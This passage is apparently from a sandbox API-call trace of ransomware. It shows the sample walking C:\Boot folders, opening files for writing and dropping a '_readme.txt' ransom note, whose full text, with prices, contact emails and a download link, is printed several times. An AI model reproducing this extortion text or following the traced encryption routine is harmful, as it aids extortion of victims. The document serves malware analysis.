pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0188.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.529] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e776e0 [0188.530] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0188.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.531] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0188.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.531] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.531] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.531] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.533] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*" (normalized: "c:\\boot\\pt-pt\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.534] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.534] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.534] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0188.534] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.535] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.535] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.536] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.536] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.559] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0188.559] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.559] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.559] PathFindFileNameW (pszPath="") returned="" [0188.560] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.560] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.560] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.560] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.561] HeapFree (in: 